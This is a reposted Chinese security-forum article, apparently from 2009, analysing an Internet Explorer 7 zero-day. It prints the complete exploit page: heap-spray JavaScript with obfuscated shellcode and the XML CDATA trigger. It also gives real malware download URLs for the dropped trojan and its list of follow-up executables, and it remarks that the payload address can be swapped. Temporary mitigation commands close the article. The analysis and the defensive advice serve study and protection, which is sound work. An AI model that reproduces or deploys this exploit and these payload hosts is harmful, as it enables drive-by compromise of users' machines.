注册
登录
论坛
搜索
插件
默认风格
默认风格_6hOY
D Dark
greenwall
jeans
fashion
私人消息 (0)
公共消息 (0)
论坛任务 (0)
系统消息 (0)
好友消息 (0)
帖子消息 (0)
【3.A.S.T】网络安全爱好者
»
黑客播报
» 【转载】攻防实战:深入剖析最新IE7.0 0day漏洞利用代码(图)
返回列表
发帖
期待~~
发短消息
加为好友
期待~~
当前离线
UID
9461
帖子
460
精华
0
积分
963
威望
1445
金钱
821
阅读权限
90
在线时间
5 小时
注册时间
2009-8-19
最后登录
2010-1-4
3.A.S.T中校
帖子
460
积分
963
威望
1445
金钱
821
在线时间
5 小时
1
楼
跳转到
»
倒序看帖
打印
字体大小:
t
T
发表于 2009-11-5 07:25
|
只看该作者
【转载】攻防实战:深入剖析最新IE7.0 0day漏洞利用代码(图)
攻防
,
实战
,
漏洞
,
剖析
,
代码
攻防
实战
:深入剖析最新IE7.0 0day
漏洞
利用
代码
(图)
这几天国内几乎所有的媒体都用大幅的版面报道了IE7.0的最新漏洞,由于
微软
迟迟没有推出安全补丁,并且该漏洞能影响到所有使用IE控件的
程序
,包括各主要
浏览器
、邮件客户端、办公
软件
、Rss订阅器以及可嵌入
网页
的所有第三方软件,影响范围极其广泛!笔者做了一个试验,在
Google
浏览器中中
搜索
一下“ie7.0 0day”出来2700多条
记录
,各大杀毒厂商纷纷推出漏洞修复
工具
以及预防方法,感觉比MS08067漏洞还热闹,算是岁末安全界的一件大事。 12月9 日,国内一些安全界知名人士的blog纷纷贴出了漏洞代码,不少无赖网站都纷纷挂上了恶意代码已
获取
利益。笔者的几个
朋友
未能幸免,点击恶意网站后导致机器蓝屏无法加载
系统
,只得郁闷的重装。为了了解恶意代码的危害,提高大家的安全意识,笔者在这里对该恶意代码进行一个简单的分析,希望能对大家有所帮助,避免不必要的损失。
黑客
获取IE7.0 最新漏洞代码
1.获取IE7.0 0day代码
获取代码的一个最好的方式就是通过Google等搜索工具搜索,
推荐
在本地在虚拟机中使用
VPN
代理
到Google英文版中搜索,相对而言国外会早于国内公布0day代码。关于该漏洞代码,现在很多安全和黑客网站都已经贴出了代码,如果没有该代码的可以到
http://www.antian365.com/bbs/viewthread.php?tid=2813&;extra=page%3D1(呵呵,顺便帮团队做下
广告
)将以下代码保存为将该代码保存为IE7_0day.htm,即IE7.0 0Day。[url=http://www.3ast.com.cn]
网络
安全
<script language="javascript">
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace("about:blank");
信息来自:
http://www.3ast.com.cn
function sleep(milliseconds)
{
var start=new Date().getTime();
for(var i=0;i<1e7;i++)
{if((new Date().getTime()-start)>milliseconds)
{break}
}
}
function spray(sc)
{
var infect=unescape(sc.replace(/dadong/g,"\x25\x75"));
var heapBlockSize=0x100000;
var payLoadSize=infect.length*2;
var szlong=heapBlockSize-(payLoadSize+0x038);
var retVal=unescape("%u0a0a%u0a0a");
retVal=getSampleValue(retVal,szlong);
aaablk=(0x0a0a0a0a-0x100000)/heapBlockSize;
zzchuck=new Array();
for(i=0;i<aaablk;i++){zzchuck=retVal+infect}
}
function getSampleValue(retVal,szlong)
{
while(retVal.length*2<szlong)
{retVal+=retVal}
retVal=retVal.substring(0,szlong/2);
return retVal
}
var a1="dadong";
spray(a1+"9090"+a1+"dadong9090dadong9090dadongE1D9dadong34D9dadong5824dadong5858dadong3358dadongB3DBdadong031C
黑客
dadong31C3dadong66C9dadongE981dadongFA65dadong3080dadong4021dadongFAE2dadong17C9dadong2122dadong4921dadong0121
dadong2121dadong214BdadongF1DEdadong2198dadong2131dadongAA21dadongCAD9dadong7F24dadong85D2dadongF1DEdadongD7C9
网络安全
dadongDEDEdadongC9DEdadong221Cdadong2121dadongD9AAdadong19C9dadong2121dadongC921dadong206Cdadong2121dadong67C9
黑客
dadong2121dadongC921dadong22FAdadong2121dadongD9AAdadong03C9dadong2121dadongC921dadong2065dadong2121dadong11C9
黑客
dadong2121dadongC921dadong22A8dadong2121dadongD9AAdadong2DC9dadong2121dadongC921dadong2040dadong2121dadong3BC9
黑客
dadong2121dadongCA21dadong7279dadongFDAAdadong4B72dadong4961dadong3121dadong2121dadongC976dadong2390dadong2121
dadongC4C9dadong2121dadong7921dadong72E2dadongFDAAdadong4B72dadong4901dadong3121dadong2121dadongC976dadong23B8
黑客
dadong2121dadongECC9dadong2121dadong7921dadong76E2dadong1DC9dadong2125dadongAA21dadong12D9dadong68E8dadongE112
黑客
dadongE291dadongD3DDdadongAC8FdadongDE66dadongE27Edadong1F7Adadong26E7dadong1F99dadong7EA8dadong4720dadongE61F
网络安全
dadong2466dadongC1DEdadongC8E2dadong25B4dadong2121dadongA07Adadong35CDdadong2120dadongAA21dadong1FF5dadong23E6
网络安全
dadong4C42dadong0145dadongE61Fdadong2563dadong420Edadong0301dadongE3A2dadong1229dadong71E1dadong4971dadong2025
网络安全
dadong2121dadong7273dadongC971dadong22E0dadong2121dadongF1DEdadongDDAAdadongE6AAdadongE1A2dadong1F29dadong39AB
网络安全
dadongFAA5dadong2255dadongCA61dadong1FD7dadong21E7dadong1203dadong1FF3dadong71A9dadongA220dadong75CDdadongE112
黑客
dadongE2A2dadong1231dadong1FE1dadong62E6dadong200Ddadong2121dadong7021dadong7172dadong7171dadong7171dadong7671
网络安全
dadongC971dadong2218dadong2121dadong38C9dadong2121dadong4521dadong2580dadong2121dadongAC21dadong4181dadongDEDE
网络安全
dadongC9DEdadong2216dadong2121dadongFA12dadong7272dadong7272dadongF1DEdadong19A1dadongA1C9dadongC819dadong2E54
dadong59A0dadongB124dadongB1B1dadong55B1dadong7427dadongCDAAdadong61ACdadongDE24dadongC9C1dadongDE0FdadongDEDE
黑客
dadongC9E2dadongDE09dadongDEDEdadong3099dadong2520dadongE3A1dadong212Ddadong3AC9dadongDEDEdadong12DEdadong71E1
黑客
dadongC975dadong2175dadong2121dadongC971dadong23AAdadong2121dadongF1DEdadongA117dadong051Ddadong5621dadongC92B
网络安全
dadong2360dadong2121dadongDE12dadongDE76dadongC9F1dadong20DAdadong2121dadongDE49dadong2121dadongDE21dadongC9F1
黑客
dadongDFC9dadongDEDEdadong7672dadong1277dadong71E1dadongC975dadong213Fdadong2121dadongC971dadong2374dadong2121
黑客
dadongF1DEdadongA117dadong051Ddadong5621dadongC92Bdadong232Adadong2121dadongDE12dadongDE76dadong79F1dadong7E7F
网络安全
dadongE27Adadong23CAdadongE279dadongD8C9dadongDEDEdadong77DEdadongA276dadong29CDdadongDDAAdadong294Bdadong1F76
网络安全
dadong56DEdadongC935dadong237Cdadong2121dadongF1DEdadongDDAAdadong4049dadong444Cdadong4921dadong6468dadong5367
信息来自:
http://www.3ast.com.cn
dadongD5AAdadong2998dadong2121dadongD221dadong5487dadong4B0Edadong1F21dadong55DEdadong0105dadong05C9dadong2123
信息来自:
http://www.3ast.com.cn
dadongDE21dadongAAF1dadongC9D9dadong20EAdadong2121dadongF1DEdadongD91Adadong2955dadongAA17dadong0565dadong1F01
网络安全
dadong21DEdadongDE1Fdadong0555dadongC93Ddadong20CEdadong2121dadongF1DEdadongE5A2dadong7E31dadong997Fdadong2120
dadong2121dadong49E2dadong4F4Edadong2121dadong5449dadong4D53dadongCA4CdadongAC34dadong0565dadong7125dadong03C9
网络安全
dadongDEDFdadong71DEdadong6BC9dadong2123dadongC821dadongDFC3dadongDEDEdadongC7C9dadongDEDEdadongA2DEdadong29E5
黑客
dadong4BE2dadong494Ddadong554Fdadong4D45dadong34CAdadong65ACdadong2505dadongC971dadongDCDAdadongDEDEdadongC971
黑客
dadong2302dadong2121dadong9AC8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong1249dadong2113
黑客
dadong4921dadong5254dadong5344dadong34CAdadong65ACdadong2505dadongC971dadongDCF0dadongDEDEdadongC971dadong20D8
dadong2121dadongB0C8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong4249dadong5657dadong4921
网络安全
dadong4952dadong4E45dadong34CAdadong65ACdadong2505dadongC971dadongDC86dadongDEDEdadongC971dadong20EEdadong2121
黑客
dadong46C8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong5749dadong5946dadongCA21dadongAC34
黑客
dadong0565dadong7125dadongA3C9dadongDEDCdadong71DEdadong8BC9dadong2120dadongC821dadongDF63dadongDEDEdadongC7C9
网络安全
dadongDEDEdadongA2DEdadong25E5dadongC9E2dadong208Adadong2121dadong3A49dadong67E7dadong7158dadongE7C9dadong2120
网络安全
dadongA221dadong29E5dadongC9E2dadong20B6dadong2121dadongCD49dadong22B6dadong712Ddadong93C9dadong2120dadongA221
信息来自:
http://www.3ast.com.cn
dadong29E5dadongC9E2dadong20A2dadong2121dadong8B49dadong2CDDdadong715DdadongBFC9dadong2120dadongA221dadong29E5
网络安全
dadongC9E2dadong204Edadong2121dadongCC49dadongCE77dadong7117dadongABC9dadong2120dadongA221dadong29E5dadongC9E2
dadong207Adadong2121dadongD149dadong25ABdadong717Edadong57C9dadong2120dadongA221dadong29E5dadongC9E2dadongDFD6
黑客
dadongDEDEdadong5949dadongFA49dadong713Ddadong43C9dadong2120dadongA221dadong29E5dadongC9E2dadong2012dadong2121
信息来自:
http://www.3ast.com.cn
dadongCE49dadongC1EFdadong7141dadong6FC9dadong2120dadongA221dadong29E5dadongC9E2dadong203Edadong2121dadong9149
黑客
dadong0C68dadong71FAdadong1BC9dadong2120dadongA221dadong29E5dadongC9E2dadongDE17dadongDEDEdadong8A49dadongBA7F
网络安全
dadong713Fdadong07C9dadong2120dadongA221dadong29E5dadongC9E2dadongDF86dadongDEDEdadong7849dadongA0B6dadong7123
黑客
dadong33C9dadong2120dadongA221dadong29E5dadongC9E2dadong21C2dadong2121dadong5F49dadongC3F9dadong7152dadongDFC9
黑客
dadong2121dadongA221dadong29E5dadongC9E2dadong21EEdadong2121dadongBF49dadong9AD8dadong7114dadongCBC9dadong2121
网络安全
dadongA221dadong29E5dadongC9E2dadongDFB3dadongDEDEdadong7649dadong9481dadong719AdadongF7C9dadong2121dadongA221
黑客
dadong29E5dadongC9E2dadongDF5FdadongDEDEdadong3B49dadong3F5Bdadong7123dadongE3C9dadong2121dadongA221dadong29E5
网络安全
dadongC9E2dadongDF4BdadongDEDEdadongC149dadong117Adadong71B5dadong8FC9dadong2121dadongA221dadong29E5dadongC9E2
网络安全
dadongDF77dadongDEDEdadongB649dadongC3E8dadong7182dadongBBC9dadong2121dadongA221dadong29E5dadongC9E2dadongDF63
黑客
dadongDEDEdadong4949dadongE405dadong7192dadongA7C9dadong2121dadongA221dadong29E5dadongC9E2dadong2176dadong2121
黑客
dadong5349dadong92DFdadong7137dadong53C9dadong2121dadongA221dadong29E5dadongC9E2dadongDF65dadongDEDEdadong32CA
信息来自:
http://www.3ast.com.cn
dadong444BdadongC971dadongDAD6dadongDEDEdadongC971dadongDF8AdadongDEDEdadong96C8dadongDEDDdadongC9DE
dadongDEC9dadongDEDEdadongC9E2dadongDC88dadongDEDEdadong6E49dadong6ECEdadong7124dadong1FC9dadong2121
黑客
dadongA221dadong29E5dadongC9E2dadong212Edadong2121dadongAF49dadong2F6Fdadong71CDdadong0BC9dadong2121dadongA221
网络安全
dadong29E5dadong12E2dadong45E1dadong61AAdadongA411dadong59E1dadong1F31dadong61AAdadong1F2Ddadong51AAdadong8C3D
黑客
dadongAA1Fdadong2961dadongCAE2dadong1F2Adadong61AAdadongA215dadong5DE1dadongAA1Fdadong1D61dadong41E2dadongAA17
dadong054Ddadong1705dadong64AAdadong171Ddadong75AAdadong5924dadongF422dadongAA1Fdadong396BdadongAA1Fdadong017B
黑客
dadongFC22dadong1AC2dadong1F68dadong15AAdadong22AAdadong12D4dadong12DEdadongDDE1dadongA58Ddadong55E1dadongE026
网络安全
dadong2CEEdadongD922dadongD5CAdadong1A17dadong055Ddadong5409dadong1FFEdadong7BAAdadong2205dadong47FCdadongAA1F
黑客
dadong6A2DdadongAA1Fdadong3D7BdadongFC22dadongAA1FdadongAA25dadongE422dadongA817dadong0565dadong403DdadongC9E2
黑客
dadongDA47dadongDEDEdadong5549dadong5155dadong0E1Bdadong560Edadong5656dadong430Fdadong4840dadong444Adadong0F42
信息来自:
http://www.3ast.com.cn
dadong4F42dadong450Edadong564Edadong0E4Fdadong4E4Adadong440Fdadong4459dadong2121dadong2121dadong2121dadong2121dadong2121
黑客
dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121
黑客
dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121
网络安全
dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121
信息来自:
http://www.3ast.com.cn
dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong0021");
黑客
sleep(3000);
nav=navigator.userAgent.toLowerCase();
if(navigator.appVersion.indexOf('MSIE')!=-1)
{
version=parseFloat(navigator.appVersion.split('MSIE')[1])
信息来自:
http://www.3ast.com.cn
}
if(version==7)
{
w2k3=((nav.indexOf('
windows
nt 5.2')!=-1)||(nav.indexOf('windows 2003')!=-1));
黑客
wxp=((nav.indexOf('windows nt 5.1')!=-1)||(nav.indexOf('windows xp')!=-1));
网络安全
if(wxp||w2k3)document.write('<XML ID=I><X><C><![CDATA[<image SRC=http://r?r.book.com src=http://www.google.com]]><![CDATA[>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>');
网络安全
var i=1;while(i<=10)
{
window.status=" ";i++}
}
</script>
2.对代码初步分析
对整个代码进行初步的分析,代码关键部分进行了加密,漏洞利用的
原理
应该是XML
解析
部分。在上面的代码中包含有“CDATA”,该标记明显为XML语言所特有。XML CDATA
的作用就是在CDATA部件之内的文本会被解析器忽略。估计是IE7.0 XML解析出现问题,从而导致挂马等漏洞利用。下面对该漏洞进行详细的分析。
网络安全
二、执行与测试该漏洞
1.搭建测试环境
(1)安装虚拟机和
操作系统
对于0Day漏洞的测试一般都是在虚拟机中测试,一些包含0Day漏洞的代码往往会
下载
病毒到本地,由于无法预估这些病毒是良性还是恶性,因此
建议
在虚拟机中进行测试。在系统中安装好VMware虚拟机软件,然后安装
Win
dows XP操作系统,关于安装虚拟机和操作系统网上有很多
教程
和
资料
,笔者就不赘述了。
网络安全
(2)配置测试环境
在虚拟机打开安装好的Windows XP操作系统,下载并安装IE7.0的升级包IE7-WindowsXP-x86-cht.
exe
,然后将刚才生成的IE7_0day.htm
文件
拖入虚拟机中的Windows XP操作系统的桌面中,如图1所示。
网络安全
黑客
图1 配置测试环境
2.
运行
IE7_0day.htm文件
在桌面上双击“IE7_0day.htm”文件,IE浏览器会提示:“为了协助保护您的资讯安全性,Internet Explorer已限制这个网页执行指令档或可以存储您
电脑
的ActiveX控制项,其他选项请按这里.......”说实话,现在这样类似的提示实在是太多,很多Flash栏被拦截的时候都会提示相同的内容,如图2所示。
黑客
图2 运行IE7_0day.htm后出现安全警告提示
说明:
如果是普通
用户
,可以不单击上面的提示,从而避免下载病毒到本地。
点击该标签栏,然后点击“允许被封锁的内容”,下载文件,如图3所示。
网络安全
图3 允许被封锁的内容
允许被封锁的内容后,IE会再弹出一个安全性警告,点击“是”后,代码就开始执行了,如图4所示。
网络安全
图4 执行代码
3 监控文件运行情况
(1)监控IE7_0day.htm运行后文件运行情况
我们使用文件监控工具看看该网页做了那些事情。双击“FileMon.exe”我们可以看到漏洞溢出后,在C:\Documents and Settings\hurricane\Local Settings\Temporary Internet Files\以及C:\Documents and Settings\hurricane\Local Settings\Temporary Internet Files\Content.IE5\6XUB49Q3\生成了ko.exe和ko[1].exe文件,如图5所示。其文件下载路径均为:
网络安全
http://www.baikec.cn/down/ko.exe(注意不要下载该文件运行,呵呵,病毒文件),这应该就是网页
制作
者挂马的地方了。[url=http://www.3ast.com.cn]
网络安全
网络安全
图 5 IE7_0day.htm下载
木马
文件到本地
(2)木马调用文件分析
从filemon的监控过程来看,应该是调用了cmd.exe来执行ko.exe,如图6所示,ko.exe文件打开了cmd.exe来创建、查询和关闭一些文件。
网络安全
黑客
图6 ko.exe调用cmd
命令
(3)ko[1].exe下载文件分析
通过文件监视器,如图7所示,Ko[1].exe在临时文件夹中78767551中生成了一些新文件,通过分析发现该程序从网站
http://www.fengtianc.cn/下再ko.txt文本文件,读取ko.txt文本中的内容后,下载文本中指定的文件并执行。[url=http://www.3ast.com.cn]
网络安全
网络安全
图7 ko[1].exe下载文件分析
到临时文件夹中找到ko.txt并打开该文件,从中可以发现34个可执行文件,其文件内容如下:
[file]
open=y
url1=http://222.gxfcd.cn/new/new1.exe
url2=http://222.gxfcd.cn/new/new2.exe
url3=http://222.gxfcd.cn/new/new3.exe
url4=http://222.gxfcd.cn/new/new4.exe
url5=http://222.gxfcd.cn/new/new5.exe
url6=http://222.gxfcd.cn/new/new6.exe
url7=http://222.gxfcd.cn/new/new7.exe
url8=http://222.gxfcd.cn/new/new8.exe
url9=http://222.gxfcd.cn/new/new9.exe
url10=http://222.gxfcd.cn/new/new10.exe
url11=http://222.gxfcd.cn/new/new11.exe
url12=http://222.gxfcd.cn/new/new12.exe
url13=http://222.gxfcd.cn/new/new13.exe
url14=http://222.gxfcd.cn/new/new14.exe
url15=http://222.gxfcd.cn/new/new15.exe
url16=http://333.gxfcd.cn/new/new16.exe
url17=http://333.gxfcd.cn/new/new17.exe
url18=http://333.gxfcd.cn/new/new18.exe
url19=http://333.gxfcd.cn/new/new19.exe
url20=http://333.gxfcd.cn/new/new20.exe
url21=http://333.gxfcd.cn/new/new21.exe
url22=http://333.gxfcd.cn/new/new22.exe
url23=http://333.gxfcd.cn/new/new23.exe
url24=http://333.gxfcd.cn/new/new24.exe
url25=http://333.gxfcd.cn/new/new25.exe
url26=http://333.gxfcd.cn/new/new26.exe
url27=http://333.gxfcd.cn/new/new27.exe
url28=http://333.gxfcd.cn/new/new28.exe
url29=http://333.gxfcd.cn/new/new29.exe
url30=http://333.gxfcd.cn/new/new30.exe
url31=http://444.gxfcd.cn/new/new31.exe
url32=http://444.gxfcd.cn/new/new32.exe
网络安全
图9 修改host文件
呵呵,说实话,我一开始也没弄明白,这个代码要屏蔽这些网站的目的是什么,后面听一个朋友的话才知道,其中的一些网站是我们国内的一些黑客组织网站;)这难道就是所谓的恶意竞争?
黑客
说明:
Hosts文件是一个用于存储
计算机
网络中节点信息的文件,它可以将
主机
名映射到相应的IP
地址
,实现DNS的
功能
,它可以由计算机的用户进行控制。Windows NT/2000/XP/2003/Vista默认位置%SystemRoot%\system32\drivers\etc\,但也可以改变。
黑客
通过执行该IE7.0 0Day可以知道黑客或者入侵者利用该工具在系统中所进行的操作。
分析和研究该代码
1.分析漏洞代码
代码应该说还是比较简单的,关键的Shellcode应该就是这一大段乱码了
spray
(a1+"9090"+a1+"dadong9090dadong9090dadongE1D9dadong34D9dadong5824dadong5858dadong3358dadongB3DBdadong031C
黑客
dadong31C3dadong66C9dadongE981dadongFA65dadong3080dadong4021dadongFAE2dad可以将这个地址进行修改变换,笔者将该地址换成了本机的一个测试地址后,同样溢出成功,如图11所示。
网络安全
图11 更改下载地址后同样溢出成功
2 .分析可疑文件
我们看看ko.exe到底做了什么事情,先查下壳,用UPX加的壳,如图11所示。
网络安全
图12查看ko.exe文件壳
使用upx脱掉该壳,简要分析该执行程序,ko.exe执行后释放一个jiocs.dll到windows
目录
,通过Rundll32.exe将该dll文件
注册
起来。至于jiocs.dll简单看了下,是一个download下载者,这也和前面监控的现象相符合。
黑客
3.分析漏洞触发原理
不怎么会javascript,所以也没有具体分析,看了
http://hi.baidu.com/vessial的介绍,大体知道是怎么触发这个漏洞的了?0day代码片断:
信息来自:
[url=http://www.3ast.com.cn/]
http://www.3ast.com.cn
if(wxp||w2k3)document.write('<XMLID=I><X><C><![CDATA[<image SRC=http://r?r.book.com
黑客
src=http://www.google.com]]><![CDATA[>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C
信息来自:
http://www.3ast.com.cn
DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>');
网络安全
关键触发是由于这个Image SRC的字段的
数据
造成的http://r?r.book.com
mshtml.dll会对这个SRC作解析,刚好该地址它们拼在一起就是一个可利用的堆地址,可使
shell
code填充到这个地址
空间
去,从而执行我们的代码。
信息来自:
http://www.3ast.com.cn
四、漏洞补丁及安全防范
关于该漏洞的补丁microsoft直到12月15号相关的补丁也没有出来,国内的一些安全组织倒是提前给出了安全补丁,呵呵,值得表扬!
黑客
给出国内的一些补丁下载地址:
360安全卫士
http://dl.360safe.com/360fixmsxml.exe[url=http://www.3ast.com.cn]
黑客
江民
http://filedown.jiangmin.com/KVIEXMLPatch.exe
信息来自:
[url=http://www.3ast.com.cn/]
http://www.3ast.com.cn
IE 最新 0day 波及了微软全线系统,目前暂时没有补丁。微软于近日发布了一份安全通报,指导您如何暂时屏蔽此漏洞。
网络安全
漏洞出在 OLEDB32.dll 这个文件上。所以我们的目的就是屏蔽这个文件。对此,微软连出了4个杀手锏:
1. SACL 法(仅适用于 Vista)
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[File Security]
"%ProgramFiles%\CommonFiles\System\Ole DB\oledb32.dll",2,"S:(ML;;NWNRNX;;;ME)"
网络安全
将以上内容保存为 BlockAccess_x86.inf
然后在命令提示符里执行 SecEdit /configure /db BlockAccess.sdb /cfg <inf file>
黑客
其中 <inf file> 为 inf 文件路径。若成功会看到“任务成功结束”的提示。
2. 禁用 Row Position 功能法
HKEY_CLASSES_ROOT\CLSID\{2048EEE6-7FA2-11D0-9E6A-00A0C9138C29}
黑客
打开注册表编辑器,将此键
删除
即可。
3. 取消 DLL 注册法
在命令提示符中输入 Regsvr32.exe /u "%ProgramFiles%\Common Files\System\Ole DB\oledb32.dll"即可
黑客
4.
权限
设置
法
在命令提示符中输入 cacls "%ProgramFiles%\Common Files\System\Ole DB\oledb32.dll" /E /P everyone:N
网络安全
Vista 系统则需要输入3个命令:
takeown /f "%ProgramFiles%\Common Files\System\Ole DB\oledb32.dll"
黑客
icacls "%ProgramFiles%\Common Files\System\Ole DB\oledb32.dll" /save %TEMP%\oledb32.32.dll.TXT
信息来自:
http://www.3ast.com.cn
icacls "%ProgramFiles%\Common Files\System\Ole DB\oledb32.dll" /deny everyone:(F)
其中第一种方法影响最小(只影响 IE 对此 DLL 的
访问
)。
五.
经验
及感受
Microsoft
在12月份已经连续发布了多个安全漏洞和补丁,网管人员现在疲于应付补丁情况。而这次的IE7 0day到今天还没有公布安全补丁,这也充分证明了代码设计人员在代码写出来之后从事代码校验和检查是一件多么重要的事情。Microsoft作为一个著名的国际大公司在代码安全上已经很注重检查和跟踪了,尚且出了这么多次安全漏洞,我们国内的一些公司在代码审核上基本上毫不设防,值得我们深思!!!
信息来自:
http://www.3ast.com.cn
本次分析只是一次简单的分析和测试,由于水平有限,没有深入的跟踪下去,如有不当之处希望大家多多指教,也希望欢迎大家多多提供安全线索,俺以及3AST安全365团队(antian365.com)将免费为您进行安全
检测
。谢谢大家耐心看完本文,不到之处请指正。
黑客
[3.A.S.T网络安全技术讨论组]
机器狗0625技术剖析(驱动读写磁盘扇区)(转看雪)
收藏
分享
@@@ 加入本站会员 一个月月赚1200+的秘密@@@
eyoucgt
发短消息
加为好友
eyoucgt
当前离线
UID
11484
帖子
22
精华
0
积分
46
威望
33
金钱
41
阅读权限
10
在线时间
9 小时
注册时间
2009-11-5
最后登录
2010-11-16
3.A.S.T士兵
帖子
22
积分
46
威望
33
金钱
41
在线时间
9 小时
2
楼
发表于 2009-11-5 10:32
|
只看该作者
本帖最后由 eyoucgt 于 2010-11-16 14:25 编辑
看不懂,over
@@@ 加入本站会员 一个月月赚1200+的秘密@@@
TOP
返回列表
【 新 手 入 门 】
初入江湖
有问必答
软件交流
程序设计
黑客播报
操作系统
Windows专区
Unix 专区
【 技 术 交 流 】
原创专区
QQ技巧
反黑知识
网站建设
教程发布
技术交流
免杀技术
0day发布
专题归类
私服技术
【 论 坛 水 区 】
被黑站点
激情灌水
极品贴图
开心乐园
影音专区
广告专区
【 论 坛 管 理 】
新人报到
论坛管理
勋章申请
[收藏此主题]
[关注此主题的新回复]
[通过 QQ、MSN 分享给朋友]
全国地图
发表于 2009-11-5 07:25
| 
